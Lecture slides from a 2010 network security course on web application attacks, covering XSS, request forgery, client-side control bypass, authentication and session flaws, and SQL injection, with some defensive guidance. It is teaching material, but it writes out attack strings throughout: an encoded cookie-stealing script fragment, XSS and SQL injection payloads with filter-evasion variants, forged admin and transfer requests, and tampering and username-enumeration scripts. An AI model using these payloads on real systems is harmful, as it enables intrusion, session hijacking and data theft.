73%63%72ipt>var+i=ne%77+Im%61ge%3b+i.s%72c=“ht%74%70%3a%2f
Stored XSS Vulnerability

[Figure: stored XSS sequence: the attacker submits a question containing malicious JavaScript; the user logs in and views the attacker’s question; the server responds with the attacker’s JavaScript; the attacker’s JavaScript executes in the user’s browser; the user’s browser sends the session token to the attacker]
DOM-based XSS

◼ A user requests a crafted URL supplied by the


attacker and containing embedded Javascript
◼ The server’s response does not contain the
attacker’s script in any form
◼ When the user’s browser processes this
response, the script is nevertheless
executed.
The case of MySpace, 2005
◼ User Samy circumvented anti-XSS filters installed to
prevent users from placing JavaScript in their user profile
pages
◼ Script executed whenever user saw Samy’s page
❑ Added Samy into “friends” list
❑ Copied itself into the victim’s page
◼ MySpace had to take the application offline, remove
malicious script from the profiles of their users, and fix
the defect
◼ Samy was forced to pay restitution and carry out three
months of community service
XSS Payloads
◼ Virtual Defacement
❑ Content of host is not affected, but loaded from
other sites
◼ Injecting Trojan Functionality
❑ “Google is moving to a pay to play model” proof of
concept created by Jim Ley, 2004
◼ Inducing User Actions
❑ Use payload script to perform actions
◼ Exploit Any Trust Relationships
XSS Payloads
Other payloads for XSS
◼ Malicious web site succeeded in the past to:
❑ Log Keystrokes
❑ Capture Clipboard Contents
❑ Steal History and Search Queries
❑ Enumerate Currently Used Applications
❑ Port Scan the Local Network
❑ Attack Other Network Hosts
◼ <img src=“http://192.168.1.1/hm_icon.gif” onerror=“notNetgear()”>
◼ This checks for the existence of a unique image that is
present if a Netgear DSL router is present
◼ And XSS can deliver those things, too
Delivery Modes
◼ Reflected and DOM-based XSS attacks
❑ Use forged email to target users
❑ Use text messages
❑ Use a “third party” web site to generate requests that
trigger XSS flaws.
◼ This is successful if the user is logged into the vulnerable
site and visits the “third party” web site at the same time.
◼ Attackers can pay for banner ads that link to a URL
containing an XSS payload for a vulnerable application
❑ Use the “tell a friend” or “tell administrator” functionality
in order to generate emails with arbitrary contents and
recipients
Delivery Modes

◼ Stored XSS attacks


❑ Look for user controllable data that is displayed:
◼ Personal information fields
◼ Names of documents, uploaded files, …
◼ Feedback or questions for admins
◼ Messages, comments, questions, …
◼ Anything that is recorded in application logs and
displayed in a browser to administrators:
❑ URLs, usernames, referer fields, user-agent field contents,

Finding Vulnerabilities
◼ Standard proof-of-concept attack strings
“><script>alert(document.cookie)</script>
❑ String is submitted as every parameter to every page of the
application
◼ Rudimentary black-list filters
❑ Look for expressions like “<script>”, …
❑ Remove or encode expression, or block request altogether
❑ Counterattack:
◼ Use exploits without the <script> or even “ < > / characters
❑ Examples:
◼ “><script > alert(document.cookie)</script >
◼ “><ScRiPt>alert(document.cookie)</ScRiPt >
◼ “%3e%3cscript%3ealert(document.cookie)%3c/script%3e
◼ “><scr<script>ipt> alert(document.cookie)</scr</script>ipt>
◼ %00”>script>alert(document.cookie)</script>
Finding Reflected XSS Vulnerabilities
◼ Look for input string that is reflected back to user
❑ should be unique and easily searchable: “Crubbardtestoin”
❑ Submit test string as every parameter using every method, including
HTTP headers
◼ Review the HTML source code to identify the location of the
test string
◼ Change the test string to test for attack possibilities
❑ XSS bullets at ha.ckers.org
❑ Signature based filters (e.g. ASP.NET anti-XSS filters) will mangle
reflection for simple attack input, but
◼ Often overlook: whitespaces before or after tags, capitalized letters, only
match opened and closed tags,
❑ Data Sanitization
◼ Can remove certain expressions altogether, but then no longer check for
further vulnerabilities: <scr<script>ipt>
◼ Can be beaten by inserting NULL characters
◼ Escapes quotation characters with a backslash
❑ Use length filters that can be avoided by contracting JavaScripts
HTTP Only Cookies

◼ An application sets a cookie as http only


❑ Set-Cookie: SessId=124987389346541029:
HttpOnly
◼ Supporting browsers will not allow client side
scripts to access the cookie
◼ This dismantles one of the methods for
session hijacking
Cross-Site Tracing
◼ Enables client-side scripts to circumvent the
HttpOnly protection
❑ Uses HTTP TRACE method
◼ used for diagnostics
◼ enabled by many web servers by default
❑ If server receives a request using the TRACE method,
➔ respond with a message whose body contains exactly the
same text of the trace request received by the server.
◼ Purpose is to allow seeing changes made by proxies, etc.
❑ Browsers submit all cookies in HTTP requests
including requests that are made with TRACE and
including cookies that are HttpOnly
Attacking other users: XSS
◼ Redirection Attacks
❑ Applications takes user-controllable input for redirection
◼ Circumvention of typical protection mechanisms
❑ Application checks whether user-supplied string starts with http:// and
then blocks the redirection or removes http://
◼ Tricks of the trade:
❑ Capitalize some of the letters in http
❑ Start with a null character (%00)
❑ Use a leading space
❑ Use double http
◼ Similar tricks when application checks whether url is in the same site as
application
❑ Application adds prefix http://bobadilla.engr.scu.edu to user input
◼ This is vulnerable if the prefix does not end with a ‘/’ character
HTTP Header Injection

◼ Application inserts user-controllable data in


an HTTP header returned by application
❑ Can be used to inject cookies
❑ Can be used to poison proxy server cache
Attacking other users: XSS

◼ Request Forgery - Session Riding


◼ On-Site Request Forgery OSRF
❑ Payload for XSS
❑ Vulnerability profile: Site allows users to submit
items viewed by others, but XSS might not be
feasible.
Example
◼ Message Board Application
◼ Messages are submitted with a request such as
POST /submit.php
Host: bobadilla.engr.scu.edu
Content-Length: 41
type=question&name=foo&message=bar
◼ Request results in
<tr> <td><img src=“/images/question.gif”></td>
<td>foo</td>
<td>bar</td></tr>
◼ Now change your request type to
type=../admin/newUser.php?username=foo&password=bar&role=admin#
◼ Request results in
<tr> <td><img src=“/images/
=../admin/newUser.php?username=foo&password=bar&role=admin#.gif”></td>
<td> </td>
<td> </td></tr>
◼ When an administrator is induced to issue this crafted request, the action is
performed
Attacking other users: XSS
◼ XSS Request Forgery (XSRF)
◼ Attacker creates website
❑ User’s browser submits a request directly to a vulnerable
application
❑ HTTP cookies are used to transmit session tokens.

◼ 2004 (D. Armstrong): visitors make automatic bids to an eBay


auction
◼ Example:
❑ Find a function that performs some interesting action on behalf of
user and that has simple request parameters
POST TransferFunds.asp HTTP/1.1
Host: bobadilla.engr.scu.edu
FromAccount=current&ToSortCode=123456&ToAccountNumber=1234567&Amount=1000.
00&When=Now
❑ Create an HTML page that issues the request without any user
interaction
▪ For GET request, use an <img> tag with src set to the vulnerable URL
▪ For POST request, use a form with hidden forms
Network Security
Van K Nguyen - HUT

Web application security


Agenda

◼ Web application (in)security


◼ From hacker’s point of view
◼ Common Attack: Code injection
◼ Common Attack: Cross-site scripting

Material in this 2-session lecture is based on


this book: “The Web Application Hacker's
Handbook: Discovering and Exploiting Security
Flaws” by Dafydd Stuttard and Marcus Pinto [Wiley
(October 22, 2007) ] – below we call it by
WebHackerHandbook
Web application security

◼ The evolution of Web applications


All kinds of things we could do online
❑ Shopping (Amazon)
❑ Social networking (FaceBook, MySpace)

❑ Banking (Citibank)

❑ Web search (Google)

❑ Auctions (eBay)

❑ Gambling

❑ Web mail (Gmail, YahooMail, Hotmail)

❑ Interactive information (Wikipedia)

… The list can go on as long as one bother to add

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 3
Web application security
◼ Why security problems:
❑ New technologies ➔ introduced new possibilities for
exploitation
◼ the most significant battleground between attackers and
people/organization with computer resources and data to defend
❑ False perception of security
◼ “This site is secure”
“This site is absolutely secure. It has been designed to use 128-bit Secure
Socket Layer (SSL/TLS) technology to prevent unauthorized users from
viewing any of your information. You may use this site with peace of mind that
your data is safe with us.”
◼ Users are urged to trust the sites’ security just because of their use of
certificates, SSL/TLS (cryptographic tools) …
◼ In fact, the majority of web applications are insecure, and in ways
that have nothing to do with SSL/TLS.
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 4
Web application security

◼ SSL/TLS is important but


absolutely not everything
we need for security
❑ SSL/TLS is for
confidentiality and integrity
of transmitted data; it is
just like a construction
block not the full house
❑ SLL/TLS do nothing to Some common web vulnerabilities found in
prevent against these sample of 100+ sites -- WebHackerHandbook
vulnerabilities mentioned

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 5
The Core Security Problem:
Users Can Submit Arbitrary Input
◼ Users can interfere with any piece of data
transmitted between the client and the server
❑ request parameters, cookies, and HTTP headers
◼ Users can send requests and can submit
parameters at a patterns different than what the
application developers expects
◼ Users are not restricted to using only a web browser
to access the application.
❑ There are numerous widely available tools that operate
alongside, or independently of, a browser, to help attack
web applications.
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 6
Examples of cheating
◼ Cheating is mainly based on sending input to the server which is
crafted to cause some event that was not expected or desired by
the application’s designer:
❑ Changing the price of a product transmitted in a hidden HTML form
field ➔ purchase the product for a cheaper
❑ Modifying a session token transmitted in an HTTP cookie ➔ hijack
the session of another authenticated user.
❑ Removing certain parameters that are normally submitted ➔ exploit
a logic flaw in the application’s processing.
❑ Altering some input that will be processed by a back-end database
➔ inject a malicious database query ➔ obtain sensitive data
◼ Can SSL/TLS help?
❑ Absolutely Not! SSL does nothing to stop an attacker from
submitting crafted input to the server.

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology
SSL/TLS can’t stop hacker creating
malicious input

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 8
Critical Factors leading to this insecurity
◼ Immature Security Awareness
◼ In-House Development
◼ Deceptive Simplicity
❑ With today’s web dev. tech., even a novice programmer can build a
powerful app from scratch in a short time.
❑ But there is a HUGE difference between producing code that is
functional and code that is secure
◼ Rapidly Evolving Threat Profile
◼ Resource and Time Constraints
◼ Overextended Technologies
Core Defense Mechanisms
The defense mechanisms employed by web applications comprise
the following core elements:
◼ Handling user access to the application’s data and functionality
➔ prevent users from gaining unauthorized access.
◼ Handling user input to the application’s functions ➔ prevent
malformed input from causing undesirable behavior.
◼ Handling attackers ➔ the application behaves appropriately
when being directly targeted
❑ Using suitable defensive measures to frustrate the attacker
◼ Managing the application itself
❑ Enabling administrators to monitor its activities and configure its
functionality.
Hacker’s handbook: Mapping the
application
◼ Mapping the application: The first step in attacking an application
❑ to gather and examine some key information ➔ gain a better
understanding of what you are up against.
◼ Enumerating the application’s content and functionality➔
understand what it actually does and how it behaves.
❑ Much of this functionality will be easy to identify, but some may
be hidden away➔ need some guesswork and luck to discover.
◼ Once obtaining a catalogue of the application’s functionality ➔
closely examine every aspect of application behavior/core
security mechanisms, and the technologies being employed.
❑ ➔ Attackers can identify the key attack surface that the
application exposes: the most interesting areas to target ➔
further subsequent probing to find exploitable vulnerabilities
Mapping the application: the steps
◼ Enumerating Content and Functionality
❑ Web Spidering
❑ User-Directed Spidering
❑ Discovering Hidden Content
◼ Brute-Force Techniques
◼ Inference from Published Content
◼ Use of Public Information
◼ Leveraging the Web Server
❑ Application Pages vs. Functional Paths
❑ Discovering Hidden Parameters
◼ Analyzing the Application
❑ Identifying Entry Points for User Input
❑ Identifying Server-Side Technologies
◼ Banner Grabbing
◼ HTTP Fingerprinting
◼ File Extensions
◼ Directory Names
◼ Session Tokens
◼ Third-Party Code Components
❑ Identifying Server-Side Functionality
◼ Dissecting Requests
◼ Extrapolating Application Behavior
❑ Mapping the Attack Surface
HACKER HANDBOOK:
BYPASSING CLIENT-SIDE
CONTROLS
Hacker Handbook: Bypassing Client-Side
Controls
◼ The core security problem with web applications: clients can submit
arbitrary input
❑ Often web applications rely upon various kinds of measures
implemented on the client side to control the data to be submitted
◼ A fundamental security flaw: the user has full control over the client
and submitted data ➔ can bypass controls implemented on the client
◼ Two major ways in which client-side controls are used to restrict user
input
❑ An app may transmit data via a client-side component, using some
mechanism that is supposed to prevent the user from modifying that data
❑ When gathering data entered by the user, an app may use client-side
controls that restrict the contents of the data to be submitted
◼ using HTML form features, client-side scripts, or thick-client technologies.
Bypassing Client-Side Controls
◼ False expectation and assumption
❑ “It is very common to see an application passing data to the client
in a form that is not directly visible or modifiable by the end user,
in the expectation that this data will be sent back to the server in
a subsequent request. Often, the application’s developers simply
assume that the transmission mechanism used will ensure that
the data transmitted via the client will not be modified along the
way.” – WebHackerHandbook
❑ the assumption that data transmitted via the client will not be
modified is FALSE!
◼ Why such a risky practice happens so often:
❑ Convenience; it is easy to do for web developers
❑ Repeating known facts back to the server reduces the per-session data
stored at the server ➔ better performance
◼ Also helps to deploy a load-balanced cluster of servers
By-passing: Hidden Form Fields
◼ If a field is flagged as hidden, it is not displayed on-screen.
❑ However, the field’s name and value are stored within the form and sent back to the application when the user submits the form.
◼ But you can easily modify this hidden field!
❑ Simply save the source code for the HTML page and edit the value of the field,
❑ then reload the source into a browser and click the Buy button.
◼ Better still, use an intercepting proxy to modify the desired data on the fly.
❑ Burp Proxy (part of Burp Suite)
❑ WebScarab
❑ Paros
◼ The proxy is placed between your web browser and the target application
❑ It can intercept every request issued to the application, and every response received back, for both HTTP and HTTPS
◼ The code behind this form is as follows:
<form action=”order.asp” method=”post”>
<p>Product: Sony VAIO A217S</p>
<p>Quantity: <input size=”2” name=”quantity”>
<input name=”price” type=”hidden” value=”1224.95”>
<input type=”submit” value=”Buy!”></p>
</form>
◼ Modify the hidden price and you can buy at a cheaper price!
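To see how little the hidden field protects, the following is a minimal sketch (Python, using the requests library) that replays the purchase with a tampered price. The field names come from the example form above; the host and URL are hypothetical.

# Minimal sketch: tampering with the hidden "price" field by replaying the
# form submission directly, bypassing the browser and any client-side checks.
# (Hypothetical host/URL; field names follow the example form above.)
import requests

data = {
    "quantity": "1",
    "price": "0.01",   # attacker-chosen value for the hidden field
}
resp = requests.post("https://wahh-app.com/order.asp", data=data)
print(resp.status_code)
# If the server trusts the client-supplied price, the order is placed at 0.01.

An intercepting proxy such as Burp achieves the same thing interactively; the point is that nothing forces the client to send the value the developer put in the form.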
Capturing User Data: HTML Form
◼ Forms can be used to impose restrictions, i.e. perform validation checks on the user-supplied data.
➔ these client-side controls are often used as a security mechanism to defend the application against malicious input
◼ However, the controls can usually be trivially circumvented ➔ leaving the application potentially vulnerable to attack.
Length limits
◼ E.g. the browser prevents the user from entering more than 3 digits in the
quantity field ➔ the server side may assume that the quantity
parameter is always < 1000
<form action=”order.asp” method=”post”>
<p>Product: Sony VAIO A217S</p>
<p>Quantity: <input size=”2” maxlength=”3” name=”quantity”>
<input name=”price” type=”hidden” value=”1224.95”>
<input type=”submit” value=”Buy!”></p>
</form>
◼ But a malicious user can easily defeat this and then take advantage of it:
❑ Submit data that is longer than this length but that is still valid in other
respects ➔ If the application accepts the overlong data➔ infer that
the length limit validation is not replicated on the server.
❑ Hacker may be able to leverage the defects in validation to exploit
SQL injection, cross-site scripting, or buffer overflows
Hacker Handbook: Bypassing Client-Side Controls
◼ Transmitting Data via the Client
❑ Hidden Form Fields
❑ HTTP Cookies
❑ URL Parameters
❑ The Referer Header
❑ Opaque Data
❑ The ASP.NET ViewState
◼ Capturing User Data: HTML Forms
❑ Length Limits
❑ Script-Based Validation
❑ Disabled Elements
◼ Capturing User Data: Thick-Client Components
❑ Java Applets
❑ Decompiling Java Bytecode
❑ Coping with Bytecode Obfuscation
❑ ActiveX Controls
◼ Reverse Engineering
◼ Manipulating Exported Functions
◼ Fixing Inputs Processed by Controls
◼ Decompiling Managed Code
◼ Shockwave Flash Objects
◼ Handling Client-Side Data Securely
❑ Transmitting Data via the Client
❑ Validating Client-Generated Data
❑ Logging and Alerting
Capturing User Data: Thick-Client
Components
◼ Another way for capturing, validating, and
submitting user data
❑ The technologies most likely to encounter: Java
applets, ActiveX controls, and Shockwave Flash
objects
Java applets
◼ the applet tag instructs the browser to load a Java applet from the specified URL and instantiate it with the name TheApplet
◼ when the user clicks the Play button, a JavaScript routine executes that invokes the getScore method of the applet
◼ This is when the actual game play takes place, after which the score is displayed in an alert dialog.
◼ The script then invokes the getObsScore method of the applet, and submits the returned value as a parameter to the submitScore.jsp URL, together with the name entered by the user
<script>
function play()
{
alert(“you scored “ + TheApplet.getScore());
document.location = “submitScore.jsp?score=” +
TheApplet.getObsScore() + “&name=” +
document.playForm.yourName.value;
}
</script>
<form name=playForm>
<p>Enter name: <input type=”text” name=”yourName” value=”“></p>
<input type=”button” value=”Play” onclick=JavaScript:play()>
</form>
<applet code=”https://wahh-game.com/JavaGame.class”
id=”TheApplet”></applet>
Obfuscation & decompiling
◼ Example: playing the game results in a dialog like
this, then followed by a request for a URL with this
form:
❑ https://wahh-game.com/submitScore.jsp?score=
c1cc3139323c3e4544464d51515352585a61606a6b&name
=daf
◼ Obfuscation:
◼ The long string returned by the getObsScore method is an obfuscated form of the score, submitted in the score parameter.
◼ Want to cheat the game and submit an arbitrarily high score? ➔ you need to know how to correctly obfuscate your chosen score, i.e. so that the server decodes it as expected. ➔ Reverse engineering is possible but difficult!
◼ Decompiling Java bytecode: decompile the applet to obtain its source
code. Java bytecode can be decompiled to recover its original source code
Handling Client-Side Data Securely
◼ The core security problem with web applications arises because client-
side components and user input are outside of the server’s direct
control.
❑ The client, and all of the data received from it, is inherently untrustworthy.
◼ Transmitting Data via the Client
❑ applications should avoid transmitting critical data (e.g. product prices and
discount rates) via the client.
❑ Often, it is possible to hold such data on the server, and reference it
directly from server-side logic
◼ Validating Client-Generated Data: Data generated on the client and
transmitted to the server cannot in principle be validated securely on the client
❑ Lightweight controls like HTML form fields and JavaScript can be trivially circumvented
❑ Thick-client components merely slow down an attacker for a short period
❑ Obfuscated client-side code provides additional obstacles, but can still be
overcome by a determined attacker
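As a minimal sketch of the first two points (hold critical data server-side and re-validate client-generated data), assuming a hypothetical order handler and a server-side price table:

# Minimal sketch of server-side validation: the price is looked up on the
# server and the quantity is re-checked, so tampering with hidden fields or
# maxlength attributes on the client has no effect.
# (Hypothetical handler; product IDs and the PRICES table are illustrative.)
PRICES = {"VAIO-A217S": 1224.95}

def handle_order(form):
    product = form.get("product", "")
    try:
        quantity = int(form.get("quantity", ""))
    except ValueError:
        return "invalid quantity", 400
    if product not in PRICES or not (1 <= quantity <= 999):
        return "invalid order", 400
    total = PRICES[product] * quantity   # price comes from the server, never from the client
    return f"charged {total:.2f}", 200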
HACKER HANDBOOK:
ATTACKING
AUTHENTICATION
Attacking Authentication
◼ Authentication Technologies
❑ HTML-forms
❑ Multi-factor mechanisms (e.g. passwords and
physical tokens)
❑ Client SSL certificates and smartcards
❑ Windows-integrated authentication
❑ Kerberos
❑ Authentication services
Design flaws
◼ Poorly chosen passwords
❑ Attack: discover password policies by trying registering several
accounts then changing passwords
❑ Brute-Forcible login
◼ the allowed number of login attempts can be found in cookies
◼ Poorly chosen usernames
❑ Could be Email addresses, and other easily guessable ones
◼ Verbose Failure Messages
❑ Can be used to guess usernames: different messages depending on whether the username or the password is invalid (the difference might be small)
❑ Another factor is the difference in timing (delay in response from the server)
➔ Hack steps:
❑ Monitor your own login session with tools as wireshark/web proxy
◼ Generate a list of (u-name, password) then automate a brute-force attack
❑ If login form is loaded using http➔ vulnerable to man-in-the-middle
attack
◼ even if the authentication itself is protected by HTTPS
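To make the hack steps above concrete, here is a minimal sketch of automating the response-difference check for username enumeration against one's own application. The login URL and form field names are hypothetical.

# Minimal sketch: detecting verbose failure messages / timing differences that
# leak whether a username exists. (Hypothetical URL and field names.)
import time, requests

CANDIDATES = ["alice", "bob", "charlie"]

for user in CANDIDATES:
    start = time.monotonic()
    r = requests.post("https://example.com/login",
                      data={"username": user, "password": "wrong-password"})
    elapsed = time.monotonic() - start
    # Differences in status code, body length or delay hint that the username is valid.
    print(f"{user:10s} status={r.status_code} length={len(r.content)} time={elapsed:.3f}s")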
Design flaws
◼ “Forgotten password” functionality
❑ Often not well tested
❑ Secondary challenges are much easier to guess
◼ User-set secret question/Password hints set by user:
usually easy ones, could be trivial
◼ Authentication information sent to an email address
specified in password recovery procedure
◼ “Remember me” functionality
❑ Insecure implementation
◼ E.g. RememberUser=“PeterGell”
◼ Simple persistent cookie
Design flaws
◼ User impersonation functionality
❑ Used by system to allow administrator to impersonate normal
users
❑ Could be implemented as a “hidden” function such as
/admin/ImpersonateUser.php
❑ Could trust user controllable data such as a cookie
◼ Non-unique user names (rare but observed in
the wild)
❑ Application might or might not enforce different passwords
❑ Hack steps: register multiple accounts with the same username but
different passwords
❑ Monitor for behavior differences when the password is already
used
❑ This allows attacks on frequent usernames
Attacking Authentication
◼ Predictable Initial Password
❑ Commonly known passwords:
◼ Common practice in schools is to use the student id numbers
❑ Hack steps: Try to obtain several passwords in quick
succession to see whether they change in a predictable
way
◼ Insecure Distribution of Credentials
❑ Typically distributed out of band such as email
❑ If there is no requirement to change passwords➔ capturing
messages / message archives yields valid credentials
Attacking Authentication
◼ Logic flaws in multistage login mechanisms
❑ Mechanisms provide additional security by adding
additional checks
❑ Logic flaws are easy to introduce: attack the logic of control flow and data consistency between stages
◼ Hacking steps:
❑ Monitor successful login
❑ Identify distinct stages and the data requested
❑ Repeat the login process with various malformed requests
❑ Check whether all demanded information is actually processed
❑ Check for client-side data that might reflect successful passing
through a stage
Attacking Authentication
◼ Insecure Storage of Credentials
❑ Often stored in unsecured form in a database
❑ Targets of sql injection attacks or authentication
weaknesses
ATTACKING SESSION
MANAGEMENT
Session Management
◼ The session management mechanism is a fundamental security component in the majority of web applications,
which enables the application
❑ to uniquely identify a given user across a number of different requests
❑ to handle the data that it accumulates about the state of that user’s
interaction with the application.
◼ If an attacker can break an application’s session
management
❑ she can effectively bypass its authentication controls
❑ masquerade as other users without knowing their credentials.
If an attacker compromises an administrative user in this way, then the attacker can own the entire application.
Why Session
◼ Why session
❑ Users do not want to have to reenter their password on every single
page of the application
◼ Implementing sessions
❑ Issue each user with a unique session token or identifier
❑ On each subsequent request to the application, the user resubmits this
token, enabling the application to determine which sequence of earlier
requests the current request relates to.
❑ HTTP cookies as the mechanism for passing these session tokens between
server and client
◼ E.g. the server’s first response to a new client contains an HTTP header
Set-Cookie: ASP.NET_SessionId=mza2ji454s04cwbgwb2ttj55
◼ and subsequent requests from the client contain the header:
Cookie: ASP.NET_SessionId=mza2ji454s04cwbgwb2ttj55
Session Management and Weakness
◼ Sessions need to store state
◼ Performance dictates to store state at client
❑ Cookies
❑ Hidden forms
◼ Asp.net view state (Not a session)
❑ Fat URL
❑ HTTP authentication (Not a session)
❑ All or combinations, which might vary within a different state
◼ Weaknesses usually come from
❑ Weak generation of session tokens
❑ Weak handling of session tokens
◼ Hacker needs to find a session token in use
❑ Find session-dependent states and forge or tamper with the token
Weaknesses in Session Token Generation
◼ Meaningful tokens
❑ Might be encoded in hex, base-64, …
❑ Might be trivially encrypted (e.g. with XOR encryption)
❑ Leak session data information
❑ If not cryptographically protected by a signature, allow simple
alteration
◼ Hacking Steps:
❑ Obtain a single token and systematically alter it, observing the effect
on the interaction with the website
❑ Log-in as several users, at different times, … to record and analyze
differences in tokens
❑ Analyze tokens for correlation related to state information such as
user names
❑ Test reverse engineering results by accessing site with artificially
created tokens.
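For example, a minimal sketch of the first hack step above, inspecting a captured token for structure; the token value and its user:timestamp layout are purely illustrative:

# Minimal sketch: inspecting a captured session token for meaningful structure.
# (The token value and its layout are illustrative, not from any real site.)
import base64, binascii

token = "ZGFmOjEyODI3NjA1MDA="          # hypothetical captured token
try:
    decoded = base64.b64decode(token).decode()
    print("decoded token:", decoded)    # e.g. "daf:1282760500" -> username + Unix time
except (binascii.Error, UnicodeDecodeError):
    print("not plain base64 -- try hex, URL decoding, or XOR with a short key")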
Predictable tokens
◼ Most brazen weakness: sequential session IDs
◼ Typical weaknesses:
❑ Concealed sequences
◼ Such as adding a constant to the previous value
❑ Time dependencies
◼ Such as using Unix, Windows NT time
❑ Weak random number generation
◼ E.g. Use NIST FIPS-140-2 statistical tests to discover
◼ Use hacker tools such as Stompy
Weaknesses in Session Token Handling
◼ Disclosure of Tokens on the Network
❑ not all interactions are protected by HTTPS
◼ Common scenario: Login, account update uses https, the rest or part
(help pages) of the site not.
◼ Use of http for pre-authenticated areas of the site such as front page,
which might issue a token
❑ Cookies can be protected by the “secure” flag
◼ Disclosure of Tokens in
❑ Logs of User browser/Web server/corporate or ISP proxy
servers/reverse proxies
❑ Referer logs of any servers that user visit by following off-site links
◼ Example: Firefox 2.? Includes referer header provided that the off-site is
also https. This exposes data in URLs
Weaknesses in Session Token Handling
◼ Multiple valid tokens concurrently assigned to the same user / session
❑ Existence of multiple tokens is an indication of a security breach
◼ Of course, the user could have abandoned and restarted a session
◼ “Static Tokens”
❑ Same token reissued to the user every time
◼ A poorly implemented “remember me” feature
◼ Other logic defects:
❑ e.g. a token consisting of a user name plus a well-randomized string, where the random part is never actually used or verified, …
Weaknesses in Session Token Handling
◼ Client exposure to Token Hijacking
❑ XSS attacks routinely query the user’s cookies
❑ Session Hijacking:
◼ Session Fixation Vulnerability:
❑ Attacker feeds token to the user, waits for them to login, then
hijacks the session
◼ Cross-Site Request Forgeries
❑ Attacker crafts request to application
❑ Incites user to send request
❑ Relies on token being sent to site
Securing Session Management
◼ Generate Strong Tokens
❑ Use cryptography
❑ Use a cryptographically strong random number generator
◼ Protect Tokens throughout their Lifecycle
❑ Transmit tokens only over https
❑ Do not use URL to transmit session tokens
❑ Implement logout functionality
❑ Implement session expiration
❑ Prevent concurrent logins
❑ Beware of / secure administrative functionality to view
session tokens
❑ Beware of errors in setting cookie domains and paths
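A minimal sketch of such token generation, using Python's secrets module (which draws from the operating system's cryptographically strong random number generator):

# Minimal sketch: generating an unpredictable session token.
# No user data, no sequence, no timestamp -- just CSPRNG output.
import secrets

def new_session_token() -> str:
    return secrets.token_hex(16)   # 128 bits of randomness, hex-encoded

print(new_session_token())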
Securing Session Management
◼ Prevent Cross-Site Scripting vulnerabilities
◼ Check tokens submitted
◼ If warranted, require two-step confirmation and / or
reauthentication to limit effects of cross-site request forgeries
❑ Consider per-page tokens
◼ Create a fresh session after successful authentication to limit effects of session fixation attacks
❑ This is particularly difficult, if sensitive information is submitted,
but user does not authenticate
◼ Log, Monitor, Alert
◼ Implement reactive session termination
CODE INJECTION
Code Injection
◼ Hacking steps:
❑ Supply unexpected syntax to cause problems
❑ Identify any anomalies in the application response
❑ Examine any error messages
❑ Systematically modify input that causes
anomalous behavior to form and verify
hypotheses on the behavior of the system
❑ Try safe commands to prove existence of injection
flaw
❑ Exploit the flaw
Code Injection Into SQL
◼ Gain knowledge of SQL
❑ Install same database as used by application on local server to test SQL
commands
❑ Consult manuals on error messages
◼ Detection:
❑ Cause an error condition:
◼ String Data
❑ Submit a single quotation mark
❑ Submit two single quotation marks
❑ Use SQL concatenation characters
▪ ‘ | | ‘ FOO (oracle)
▪ ‘ + ‘ FOO (MS-SQL)
▪ ‘ ‘ FOO (No space between quotation marks) (MySQL)
◼ Numeric Data
❑ Replace numeric value with arithmetic (Instead of 5, submit 2+3)
❑ Use sql-specific keywords
▪ 67-ASCII(‘A’) is equivalent to 2 in SQL
❑ Beware of special meaning of characters in http such as ‘&’, ‘=‘, …
Detection
◼ Cause an error condition:
❑ Select / Insert Statements
◼ Entry point is usually ‘where’ clause, but ‘order by’ etc.
might also be injected
◼ Example: admin’ or 1=1
❑ Example injections into user name field for injection
into insert, where we do not know the number of
parameters:
◼ foo ’)--
◼ foo ‘ , 1) –
◼ foo ‘ , 1 , 1) –
◼ foo ‘ , 1 , 1 , 1) –
❑ Here we rely on 1 being cast into a string.
Union operator
◼ Usual:
SELECT author, title, year FROM books WHERE publisher = ‘Wiley’
◼ Fake by inserting the input below
Wiley’ UNION SELECT username, password, uid FROM users--
That is to obtain
SELECT author, title, year FROM books WHERE publisher = ‘Wiley’
UNION SELECT username, password, uid FROM users--’
◼ Should look at error messages in order to reformulate the string more successfully
❑ ‘ UNION SELECT NULL--
❑ ‘ UNION SELECT NULL, NULL--
❑ ‘ UNION SELECT NULL, NULL, NULL--
Union operator
◼ Find out how many columns the query returns:
❑ ORDER BY 1 --
❑ ORDER BY 2 --
❑ ORDER BY 3 –
◼ Find out which columns have the string data
type
❑ UNION SELECT ‘a’, NULL, NULL--
❑ UNION SELECT NULL, ‘a’, NULL--
❑ UNION SELECT NULL, NULL, ‘a’--
Fingerprinting the database
◼ Why fingerprinting:
❑ Important because of differences in SQL supported
◼ E.g.: Oracle SQL requires a from clause in all selects
◼ How
❑ Obtain version string of database from
◼ UNION SELECT banner,NULL,NULL from v$version
❑ Try different ways of concatenation
◼ Oracle: ‘Tho’||’mas’
◼ MS-SQL: ‘Tho’+’mas’
◼ MySQL: ‘Tho’ ‘mas’ (with space between quotes)
❑ Different numbering formats
◼ Oracle: BITAND(1,1)-BITAND(1,1)
◼ MS-SQL: @@PACK_RECEIVED-@@PACK_RECEIVED
◼ MySQL: CONNECTION_ID() - CONNECTION_ID()
MS-SQL: Exploiting ODBC Error
Messages
◼ Inject
‘ having 1=1 --
❑ Generates error message
◼ Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’ (Microsoft)
[ODBC SQL Server Driver] [SQL Server] Column ‘users.ID’ is invalid in the
select list because it is not contained in an aggregate function and there is no
GROUP BY clause
◼ Inject
‘ group by users.ID having 1=1 --
❑ Generates error message
◼ Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’ (Microsoft)
[ODBC SQL Server Driver] [SQL Server] Column ‘users.username’ is invalid
in the select list because it is not contained in an aggregate function and there
is no GROUP BY clause
MS-SQL: Exploiting ODBC Error
Messages
◼ Inject
◼ ‘ group by users.ID, users.username, users.password,
users.privs having 1=1 --
❑ Generates no error message
❑ Now proceed injecting union statements to find data
types for each column
❑ Inject
◼ ‘ union select sum(username) from users--’
By-passing filters
◼ Avoiding blocked characters
❑ The single quotation mark is not required for
injecting into a numeric data field
❑ If the comment character is blocked, craft injection
so that it does not break the surrounding query
◼ ‘ or 1 = 1 -- ➔ ‘ or ‘a’ = ‘ a
❑ MS-SQL does not need semicolons to separate
several commands in a batch
By-passing filters
◼ Circumventing simple validation
❑ If a simple blacklist is used, attack canonicalization and validation.
❑ E.g. instead of select, try
◼ SeLeCt
◼ SELSELECTECT
◼ %53%45%4c%45%43%54
◼ %2553%2545%254c%2545%2543%2554
◼ Use inline comments
❑ SEL/*foo*/ECT (valid in MySQL)
